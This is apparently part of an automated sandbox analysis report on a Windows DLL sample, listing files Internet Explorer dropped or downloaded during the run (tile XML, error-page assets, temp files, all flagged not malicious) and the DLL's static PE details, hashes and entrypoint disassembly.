                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):656
                                  Entropy (8bit):5.163597157714972
                                  Encrypted:false
                                  SSDEEP:12:TMHdNMNxx40vnWimI002EtM3MHdNMNxx40vnWimI00Ob6Kq5EtMb:2d6NxLSZHKd6NxLSZ7ob
                                  MD5:85B9BA302AE9A93C54D180E68D8A552A
                                  SHA1:7025EB7E210B19C2E43923A36946A4848CEF1D00
                                  SHA-256:1B9C786934EE484BB1507D312E47F432C14214BDDFDE8FDC71E97CF04DF06023
                                  SHA-512:3F89BA55B049CCA25347DDE871397B6EE129D4D1C333F969E953AFF5B1491DA5AECCD9A8278D07B21480BBB4F565D7BFEC28793F41B209BCA2CCE29C6B4B1CE7
                                  Malicious:false
                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x715b4756,0x01d742e1</date><accdate>0x715b4756,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x715b4756,0x01d742e1</date><accdate>0x715b4756,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):659
                                  Entropy (8bit):5.147855963240122
                                  Encrypted:false
                                  SSDEEP:12:TMHdNMNxcRnWimI002EtM3MHdNMNxcRnWimI00ObVEtMb:2d6NxQSZHKd6NxASZ7Db
                                  MD5:32E994F553E905D3DB22776733CD0503
                                  SHA1:48A028162646914C352E3F3128C1E7F6A817759A
                                  SHA-256:A2CB11D8383E13C6A48AEBE325305DA8AF12AD2FEE3E53AAD88E987B34D91C3C
                                  SHA-512:9EA27FFC7DEC62E48F7B83EE93837BA164A00C4C7F41434005114ED66316E8D3C4DABA219CA9C32A36B73D3098BCDA79C9C03747665EDD74748145597CFC65ED
                                  Malicious:false
                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7156829e,0x01d742e1</date><accdate>0x7156829e,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7156829e,0x01d742e1</date><accdate>0x7158e55c,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):653
                                  Entropy (8bit):5.086656438816332
                                  Encrypted:false
                                  SSDEEP:12:TMHdNMNxfnxnWimI002EtM3MHdNMNxfnxnWimI00Obe5EtMb:2d6NxZSZHKd6NxZSZ7ijb
                                  MD5:39781118704E21F48B01A11FAF1889BD
                                  SHA1:B82B63515994B9D8937D11C08305DF7B82F75991
                                  SHA-256:319D945105F64E310DC748941AEB5353E5E03CE9B23874FA2183385FBD85BA97
                                  SHA-512:76C3EFF22C2673A0A5C4151E3F12F49AA63E190051D488F4DB4912BAD25692231E4678A7F00A2E48E637320D24E53B3D19A40936FA571D31155660736F68C59D
                                  Malicious:false
                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x7158e55c,0x01d742e1</date><accdate>0x7158e55c,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x7158e55c,0x01d742e1</date><accdate>0x7158e55c,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\ErrorPageTemplate[1]
                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                  Category:downloaded
                                  Size (bytes):2168
                                  Entropy (8bit):5.207912016937144
                                  Encrypted:false
                                  SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                  MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                  SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                  SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                  SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                  Malicious:false
                                  IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                  Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\bullet[1]
                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):447
                                  Entropy (8bit):7.304718288205936
                                  Encrypted:false
                                  SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                  MD5:26F971D87CA00E23BD2D064524AEF838
                                  SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                  SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                  SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                  Malicious:false
                                  IE Cache URL:res://ieframe.dll/bullet.png
                                  Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\info_48[1]
                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4113
                                  Entropy (8bit):7.9370830126943375
                                  Encrypted:false
                                  SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                  MD5:5565250FCC163AA3A79F0B746416CE69
                                  SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                  SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                  SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                  Malicious:false
                                  IE Cache URL:res://ieframe.dll/info_48.png
                                  Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[1]
                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):748
                                  Entropy (8bit):7.249606135668305
                                  Encrypted:false
                                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                  MD5:C4F558C4C8B56858F15C09037CD6625A
                                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                  Malicious:false
                                  IE Cache URL:res://ieframe.dll/down.png
                                  Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\errorPageStrings[1]
                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                  Category:downloaded
                                  Size (bytes):4720
                                  Entropy (8bit):5.164796203267696
                                  Encrypted:false
                                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                  Malicious:false
                                  IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                  Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\background_gradient[1]
                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                  Category:downloaded
                                  Size (bytes):453
                                  Entropy (8bit):5.019973044227213
                                  Encrypted:false
                                  SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                  MD5:20F0110ED5E4E0D5384A496E4880139B
                                  SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                  SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                  SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                  Malicious:false
                                  IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                  Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\httpErrorPagesScripts[1]
                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                  Category:downloaded
                                  Size (bytes):12105
                                  Entropy (8bit):5.451485481468043
                                  Encrypted:false
                                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                  MD5:9234071287E637F85D721463C488704C
                                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                  Malicious:false
                                  IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                  Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1]
                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                  Category:downloaded
                                  Size (bytes):6495
                                  Entropy (8bit):3.8998802417135856
                                  Encrypted:false
                                  SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                  MD5:F65C729DC2D457B7A1093813F1253192
                                  SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                  SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                  SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                  Malicious:false
                                  IE Cache URL:res://ieframe.dll/http_404.htm
                                  Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                  C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):89
                                  Entropy (8bit):4.516252432360235
                                  Encrypted:false
                                  SSDEEP:3:oVXUWTFUKftd4T498JOGXnEWTFUKf3IZun:o9UcVftdU49qEcVf4g
                                  MD5:BCD1C7004F306795816D1E05C4A0BCED
                                  SHA1:1876D5B051CB27B8F21A670CACA23F435E4D3233
                                  SHA-256:A8AA6263291901BA6AA6AC989E76B1459E3E45F77BB92AEF4A67E340CF5E2851
                                  SHA-512:21EAA3DF5E9D4157D1F4149F3EEF871093495F67CAD75BF002339D511EB2C43D7F6D558AE99C3A02F76526E88739143AA3CC4F9935E45856B3460C8C559960D0
                                  Malicious:false
                                  Preview: [2021/05/06 18:36:14.588] Latest deploy version: ..[2021/05/06 18:36:14.603] 11.211.2 ..
                                  C:\Users\user\AppData\Local\Temp\~DF71AFC16E996A3DCA.TMP
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):40105
                                  Entropy (8bit):0.6615204351898638
                                  Encrypted:false
                                  SSDEEP:96:kBqoxKAuvScS+QWMNWTJkz+3TJkz+3EJkz+3R:kBqoxKAuqR+QWMNWTfDf0fh
                                  MD5:1361DBCE93EE04C042C4C4CCD1A532C4
                                  SHA1:7307943A6F9A92F97A11C8F2D1DAD9C776C2B80D
                                  SHA-256:4EA598F7369159271B7CE55DBF1D9F7A1DE10AA99507A63376EB8C56C7BA50A8
                                  SHA-512:2AEAAF7A352723BFF7F52408DC610B99165FC5A80307B352A32CC323685D399A3013F47683DECCB2F6C00761009EF4AE3547D458CCFEF8A1E7DDA46C4A560FEF
                                  Malicious:false
                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Temp\~DF8CF38F8205796A33.TMP
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):12933
                                  Entropy (8bit):0.4095497570778211
                                  Encrypted:false
                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9loQF9loY9lW5LdLMUP:kBqoIjV5LdYUP
                                  MD5:1BA428B1FFA2F54EA7D2A3395C21C13B
                                  SHA1:B8863FB1D9D8CC29226F4101FE8E12BCC41C9D33
                                  SHA-256:694ECED7FACACEE4BD8D561B86275DA9D2BDCD97EF97E71E6C779ADE017C068F
                                  SHA-512:2B5CAF0E67B0D6F395BE6BD95EF9E433FB6559F00943F8E4681B45AC58387AF6140E6DEE925DBCEA200C96F8FDF256C5E91D7A2FA97EB8B01AFD62D8D6169F1D
                                  Malicious:false
                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):6.4676770958554455
                                  TrID:
                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                  • DOS Executable Generic (2002/1) 0.20%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:6a76e615_by_Libranalysis.dll
                                  File size:871936
                                  MD5:6a76e615a7997fc04e3003ce16c9bc3d
                                  SHA1:90d82c7e8a3f2d3c4ec8e4542605eafbcb07bf95
                                  SHA256:f9f77f992f0c7bf8ec0a39acdac1a343f6418e50510db1f92347d5270d0ab9ab
                                  SHA512:b132a87d0c5391049d57f8cf3448a86b5f69822b2dfa51e99235ed497fa25b981664d8545e6d34c12f46cb39835f6b324198fb12de45a9e8588a83d2afb4e595
                                  SSDEEP:12288:KO2UqKIpQyBwBJpU4OpQHXi/AfBC0arX3kHcWlNyZaH/3LYwVe5xd2hx:Z920HS/Aff0yNNyZu3LTeW
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q...q...q...V*..r...o.G.s.....B.s...o.A.t...o.W.....o.P.v...V*..}...q.......o.^.|...o.F.p...o.@.p...o.E.p...Richq..........

                                  File Icon

                                  Icon Hash:74f0e4ecccdce0e4

                                  Static PE Info

                                  General

                                  Entrypoint:0x102c580
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x1000000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                  DLL Characteristics:DYNAMIC_BASE
                                  Time Stamp:0x4BBB12A1 [Tue Apr 6 10:53:21 2010 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:0
                                  File Version Major:5
                                  File Version Minor:0
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:0
                                  Import Hash:973489e8c974fff7f93fb4970ed9b5a2

                                  Entrypoint Preview

                                  Instruction
                                  mov edi, edi
                                  push ebp
                                  mov ebp, esp
                                  cmp dword ptr [ebp+0Ch], 01h
                                  jne 00007F81D0E548E7h
                                  call 00007F81D0E6CA25h
                                  mov eax, dword ptr [ebp+10h]
                                  push eax
                                  mov ecx, dword ptr [ebp+0Ch]
                                  push ecx
                                  mov edx, dword ptr [ebp+08h]
                                  push edx
                                  call 00007F81D0E548F4h
                                  add esp, 0Ch
                                  pop ebp
                                  retn 000Ch
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  mov edi, edi
                                  push ebp
                                  mov ebp, esp
                                  push FFFFFFFEh
                                  push 010C84C8h
                                  push 0103B300h
                                  mov eax, dword ptr fs:[00000000h]
                                  push eax
                                  add esp, FFFFFFE8h
                                  push ebx
                                  push esi
                                  push edi
                                  mov eax, dword ptr [010CBE20h]
                                  xor dword ptr [ebp-08h], eax
                                  xor eax, ebp
                                  push eax
                                  lea eax, dword ptr [ebp-10h]
                                  mov dword ptr fs:[00000000h], eax
                                  mov dword ptr [ebp-18h], esp
                                  mov dword ptr [ebp-1Ch], 00000001h
                                  cmp dword ptr [ebp+0Ch], 00000000h
                                  jne 00007F81D0E548F2h
                                  cmp dword ptr [010D03F8h], 00000000h
                                  jne 00007F81D0E548E9h
                                  xor eax, eax
                                  jmp 00007F81D0E54A33h
                                  mov dword ptr [ebp-04h], 00000000h
                                  cmp dword ptr [ebp+0Ch], 01h
                                  je 00007F81D0E548E8h
                                  cmp dword ptr [ebp+0Ch], 02h
                                  jne 00007F81D0E54936h
                                  cmp dword ptr [01094090h], 00000000h
                                  je 00007F81D0E548F7h
                                  mov eax, dword ptr [ebp+10h]
                                  push eax
                                  mov ecx, dword ptr [ebp+0Ch]
                                  push ecx
                                  mov edx, dword ptr [ebp+08h]
                                  push edx
                                  call dword ptr [01094090h]
                                  mov dword ptr [ebp-1Ch], eax
                                  cmp dword ptr [ebp-1Ch], 00000000h
                                  je 00007F81D0E548F6h
                                  mov eax, dword ptr [ebp+10h]
                                  push eax
                                  mov ecx, dword ptr [ebp+0Ch]
                                  push ecx
                                  mov edx, dword ptr [ebp+08h]
                                  push edx
                                  call 00007F81D0E6464Bh

                                  Rich Headers

                                  Programming Language:
                                  • [ C ] VS2008 build 21022
                                  • [LNK] VS2008 build 21022
                                  • [ C ] VS2005 build 50727
                                  • [ASM] VS2008 build 21022
                                  • [IMP] VS2005 build 50727
                                  • [RES] VS2008 build 21022
                                  • [C++] VS2008 build 21022
                                  • [IMP] VS2008 build 21022
                                  • [EXP] VS2008 build 21022

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0xca6500x48.rdata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc98e80x64.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xe10000x3c8.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xe20000x5adc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x913400x1c.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc55000x40.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x910000x244.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x8f2710x8f400False0.454819071771data6.32766080365IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .rdata0x910000x396980x39800False0.527394701087data5.61071149584IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0xcb0000x15de80x5200False0.388814786585data4.9202387107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .rsrc0xe10000x3c80x400False0.4140625data3.16300752289IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0xe20000x664a0x6800False0.673490084135data6.32175906547IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_VERSION0xe10600x368dataEnglishUnited States

                                  Imports

                                  DLLImport
